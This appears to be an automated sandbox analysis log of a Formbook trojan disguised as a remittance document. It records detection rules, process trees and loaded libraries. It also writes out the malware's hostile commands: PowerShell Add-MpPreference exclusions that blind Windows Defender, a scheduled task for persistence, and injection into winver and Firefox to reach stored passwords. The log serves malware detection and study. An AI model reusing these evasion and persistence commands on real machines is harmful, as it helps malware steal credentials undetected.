            Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: GRogNEHvcL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, eQDLlF0mF1BvPPtfCH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, eQDLlF0mF1BvPPtfCH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, eQDLlF0mF1BvPPtfCH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, eQDLlF0mF1BvPPtfCH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, eQDLlF0mF1BvPPtfCH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, eQDLlF0mF1BvPPtfCH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@15/13
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeFile created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMutant created: NULL
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMutant created: \Sessions\1\BaseNamedObjects\WVXKpkRvKfhpxT
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeFile created: C:\Users\user\AppData\Local\Temp\tmp16FF.tmpJump to behavior
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: winver.exe, 00000011.00000002.4494261459.0000000003331000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4494261459.0000000003354000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2514621465.0000000003307000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2514712647.0000000003327000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4494261459.0000000003327000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeReversingLabs: Detection: 42%
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeVirustotal: Detection: 54%
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeFile read: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
            Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"Jump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: urlmon.dllJump to behavior
